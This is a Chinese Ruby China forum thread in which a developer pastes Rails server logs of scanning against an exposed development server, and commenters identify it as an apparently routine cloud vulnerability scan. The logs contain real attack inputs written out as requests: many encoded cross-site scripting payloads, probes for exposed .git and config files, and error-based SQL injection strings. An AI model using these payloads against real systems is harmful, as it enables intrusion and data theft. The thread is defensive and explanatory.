Ruby China

瞎扯淡 直播有人试图对我的开发服务器进行爆破

pynix · 2016年06月23日 · 最后由 pynix 回复于 2016年06月23日 · 6406 次阅读

把开发服务器映射到外网,确定没在刷新,但是 log 不停的刷,各位看看是不是有人在扫描或者试图爆破什么的。。。。

Started GET "/providers/1/.DS_Store" for 121.42.0.17 at 2016-06-23 05:12:02 +0800
Started GET "/providers/1/.svn/entries" for 121.42.0.17 at 2016-06-23 05:12:05 +0800
Started GET "/providers/1/.git/config" for 121.42.0.17 at 2016-06-23 05:12:12 +0800
Started GET "/providers/1/.htaccess" for 121.42.0.17 at 2016-06-23 05:12:35 +0800
Started GET "/providers/1/index.php?disp=dynamic" for 121.42.0.17 at 2016-06-23 05:12:54 +0800
Started GET "/providers/1/phpsysinfo/index.php?disp=dynamic" for 121.42.0.17 at 2016-06-23 05:12:58 +0800
Started GET "/providers/1/.bzr/branch-format" for 121.42.0.17 at 2016-06-23 05:13:18 +0800
Started GET "/providers/1/.hg/requires" for 121.42.0.17 at 2016-06-23 05:13:36 +0800
Started GET "/providers/1/CVS/Root" for 121.42.0.17 at 2016-06-23 05:13:49 +0800
Started GET "/providers/1/uc_server/uctools.php" for 121.42.0.17 at 2016-06-23 05:14:00 +0800
Started GET "/providers/1/download/" for 121.42.0.17 at 2016-06-23 05:14:44 +0800
Started GET "/providers/1/downloads/" for 121.42.0.17 at 2016-06-23 05:14:48 +0800
Started GET "/providers/1/bin/" for 121.42.0.17 at 2016-06-23 05:14:51 +0800
Started GET "/providers/1/htdocs/" for 121.42.0.17 at 2016-06-23 05:15:14 +0800
Started GET "/providers/1/upfile/" for 121.42.0.17 at 2016-06-23 05:15:29 +0800
Started GET "/providers/1/upfiles/" for 121.42.0.17 at 2016-06-23 05:15:38 +0800
Started GET "/providers/1/uploadfile/" for 121.42.0.17 at 2016-06-23 05:16:06 +0800
Started GET "/providers/1/uploadfiles/" for 121.42.0.17 at 2016-06-23 05:16:27 +0800
Started GET "/providers/1/web/" for 121.42.0.17 at 2016-06-23 05:16:30 +0800
Started GET "/providers/1/data/" for 121.42.0.17 at 2016-06-23 05:16:32 +0800
Started GET "/providers/1/backup/" for 121.42.0.17 at 2016-06-23 05:17:29 +0800
Started GET "/providers/1/uploads/" for 121.42.0.17 at 2016-06-23 05:17:49 +0800
Started GET "/providers/1/upload/" for 121.42.0.17 at 2016-06-23 05:17:54 +0800
Started GET "/providers/1/config/" for 121.42.0.17 at 2016-06-23 05:17:59 +0800
Started GET "/providers/1/logs/" for 121.42.0.17 at 2016-06-23 05:18:06 +0800
Started GET "/providers/1/log/" for 121.42.0.17 at 2016-06-23 05:18:09 +0800
Started GET "/providers/1/comments?page=2" for 121.42.0.17 at 2016-06-23 05:18:12 +0800
Started GET "/cgi-bin/authlogin.cgi" for 121.42.0.17 at 2016-06-23 05:18:24 +0800
Started GET "/cgi-bin/it.cgi" for 121.42.0.17 at 2016-06-23 05:18:30 +0800
Started GET "/cgi-bin/test-cgi" for 121.42.0.17 at 2016-06-23 05:18:30 +0800
Started GET "/cgi-sys/defaultwebpage.cgi" for 121.42.0.17 at 2016-06-23 05:18:30 +0800
Started GET "/cgi-sys/FormMail-clone.cgi" for 121.42.0.17 at 2016-06-23 05:18:31 +0800
Started GET "/xampp/cgi.cgi" for 121.42.0.17 at 2016-06-23 05:18:41 +0800
Started GET "/providers/1/bigdump.php" for 121.42.0.17 at 2016-06-23 05:18:44 +0800
Started GET "/providers/1/adminer.php" for 121.42.0.17 at 2016-06-23 05:18:45 +0800
Started GET "/providers/1/phpinfo.php" for 121.42.0.17 at 2016-06-23 05:19:01 +0800
Started GET "/providers/1/info.php" for 121.42.0.17 at 2016-06-23 05:19:11 +0800
Started GET "/providers/1/php.php" for 121.42.0.17 at 2016-06-23 05:19:12 +0800
Started GET "/providers/1/test.php" for 121.42.0.17 at 2016-06-23 05:19:14 +0800
Started GET "/providers/1/show.php" for 121.42.0.17 at 2016-06-23 05:19:15 +0800
Started GET "/providers/1/index.php" for 121.42.0.17 at 2016-06-23 05:19:16 +0800
Started GET "/providers/1/a.php" for 121.42.0.17 at 2016-06-23 05:19:19 +0800
Started GET "/providers/1/1.php" for 121.42.0.17 at 2016-06-23 05:19:24 +0800
Started GET "/providers/1/u.php?act=phpinfo" for 121.42.0.17 at 2016-06-23 05:19:25 +0800
Started GET "/providers/1/l.php?act=phpinfo" for 121.42.0.17 at 2016-06-23 05:19:26 +0800
Started GET "/providers/1/tz.php?act=phpinfo" for 121.42.0.17 at 2016-06-23 05:19:27 +0800
Started GET "/providers/1/app/dev/svinfo.php?phpinfo=true" for 121.42.0.17 at 2016-06-23 05:19:30 +0800
Started GET "/providers/1/install/svinfo.php?phpinfo=true" for 121.42.0.17 at 2016-06-23 05:19:32 +0800
Started GET "/providers/1/comments?page=2i1346253i" for 121.42.0.17 at 2016-06-23 05:19:47 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3C/body%3E%3Cbody+onload=prompt()%3E" for 121.42.0.17 at 2016-06-23 05:19:49 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3C%2fbody%3E%3Cbody%20onload%3dprompt%28%29%3e" for 121.42.0.17 at 2016-06-23 05:19:54 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253C%252fbody%253E%253Cbody%2520onload%253dprompt%2528%2529%253e" for 121.42.0.17 at 2016-06-23 05:19:57 +0800
Started GET "/providers/1/comments?page=javascript:alert(1987)" for 121.42.0.17 at 2016-06-23 05:20:00 +0800
Started GET "/providers/1/comments?page=javascript%3Aalert%281987%29" for 121.42.0.17 at 2016-06-23 05:20:02 +0800
Started GET "/providers/1/comments?page=javascript%253Aalert%25281987%2529" for 121.42.0.17 at 2016-06-23 05:20:04 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3Cimg/src/onerror=alert()%3E" for 121.42.0.17 at 2016-06-23 05:20:05 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3Cimg%2fsrc%2fonerror%3Dalert%28%29%3E" for 121.42.0.17 at 2016-06-23 05:20:07 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253Cimg%252fsrc%252fonerror%253Dalert%2528%2529%253E" for 121.42.0.17 at 2016-06-23 05:20:08 +0800
Started GET "/providers/1/comments?page=%27%22+onmouseover=alert()+d=%27%22" for 121.42.0.17 at 2016-06-23 05:20:14 +0800
Started GET "/providers/1/comments?page=%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22" for 121.42.0.17 at 2016-06-23 05:20:15 +0800
Started GET "/providers/1/comments?page=%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522" for 121.42.0.17 at 2016-06-23 05:20:17 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E" for 121.42.0.17 at 2016-06-23 05:20:20 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E" for 121.42.0.17 at 2016-06-23 05:20:22 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E" for 121.42.0.17 at 2016-06-23 05:20:25 +0800
Started GET "/providers/1/comments?page=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" for 121.42.0.17 at 2016-06-23 05:20:34 +0800
Started GET "/providers/1/comments?page=amF2YXNjcmlwdDpwcm9tcHQoMTExKTt4" for 121.42.0.17 at 2016-06-23 05:20:38 +0800
Started GET "/providers/1/'%22+onmouseover=alert()+d='%22" for 121.42.0.17 at 2016-06-23 05:20:49 +0800
Started GET "/providers/1/%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22" for 121.42.0.17 at 2016-06-23 05:20:50 +0800
Started GET "/providers/1/%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522" for 121.42.0.17 at 2016-06-23 05:20:51 +0800
Started GET "/providers/1/comments/'%22+onmouseover=alert()+d='%22/?page=2" for 121.42.0.17 at 2016-06-23 05:20:52 +0800
Started GET "/providers/1/comments/%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22/?page=2" for 121.42.0.17 at 2016-06-23 05:20:53 +0800
Started GET "/providers/1/comments/%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522/?page=2" for 121.42.0.17 at 2016-06-23 05:20:55 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Ciframe%20onload=alert()%3E" for 121.42.0.59 at 2016-06-23 05:20:57 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Cimg%20src=x%20onerror=prompt()%3E" for 121.42.0.57 at 2016-06-23 05:21:03 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Csvg%20onload=prompt()%3E" for 121.42.0.56 at 2016-06-23 05:21:05 +0800
Started GET "/providers/1/comments?page=2" for 121.42.0.58 at 2016-06-23 05:21:10 +0800
Started GET "/providers/1/'%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E" for 121.42.0.17 at 2016-06-23 05:21:16 +0800
Started GET "/providers/1/%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E" for 121.42.0.17 at 2016-06-23 05:21:21 +0800
Started GET "/providers/1/%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E" for 121.42.0.17 at 2016-06-23 05:21:26 +0800
Started GET "/providers/1/comments/'%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E/?page=2" for 121.42.0.17 at 2016-06-23 05:21:39 +0800
Started GET "/providers/1/comments/%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E/?page=2" for 121.42.0.17 at 2016-06-23 05:21:46 +0800
Started GET "/providers/1/comments/%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E/?page=2" for 121.42.0.17 at 2016-06-23 05:22:11 +0800
pynix #1 2016年06月23日

这个点还有人在吗?

pynix #2 2016年06月23日

好像在搞什么脚本。。。。

pynix #3 2016年06月23日

貌似已经停了。。。。。

pynix #4 2016年06月23日 
Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1%27+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%27SPp%27%3D%27SPp" for 121.42.0.17 at 2016-06-23 05:59:31 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--+SPp" for 121.42.0.17 at 2016-06-23 05:59:32 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1%25%27+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27" for 121.42.0.17 at 2016-06-23 05:59:32 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1%27%29+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%28%27SPp%27%3D%27SPp" for 121.42.0.17 at 2016-06-23 05:59:33 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255

这是扫 sql 注入吗?可惜扫在静态文件了。。。

1 个赞
pynix #5 2016年06月23日

Started GET "/assets/backup/" for 121.42.0.17 at 2016-06-23 06:17:05 +0800

悲剧。。。。。换域名。。。。

pynix #7 2016年06月23日

改域名什么的还是算了,ittun.com 的锅。。。。

pynix #9 2016年06月23日

ssl 证书有猫腻。。。

chareice #11 2016年06月23日

看起来像是阿里云盾在扫描。

besfan #12 2016年06月23日

可以看下反向代理的日志,比如 nginx 日志,默认配置会记录请求的 agent。阿里云盾的请求会有类似 Alibaba.Security.Heimdall的关键字

1 个赞
adamshen #14 2016年06月23日

看 url 像是在扫描后台地址

zj0713001 #15 2016年06月23日

这种很正常啊 基本上所有网站每天都会被扫个 10 遍 8 遍的 不要惊慌。。。

1 个赞
ghy459 #16 2016年06月23日

https://help.aliyun.com/knowledge_detail/5975223.html

这是云盾态势感知的漏洞扫描服务。如果不想被扫,可以提工单解决。

pynix #17 2016年06月23日

原来也就是这些常规扫描手段,还以为云盾有多牛逼呢。。。

zhangsm #18 2016年06月23日

#10 楼 @pynix 请问楼主 截图信息是使用什么工具进行查询哒?

需要 登录 后方可回复, 如果你还没有账号请 注册新账号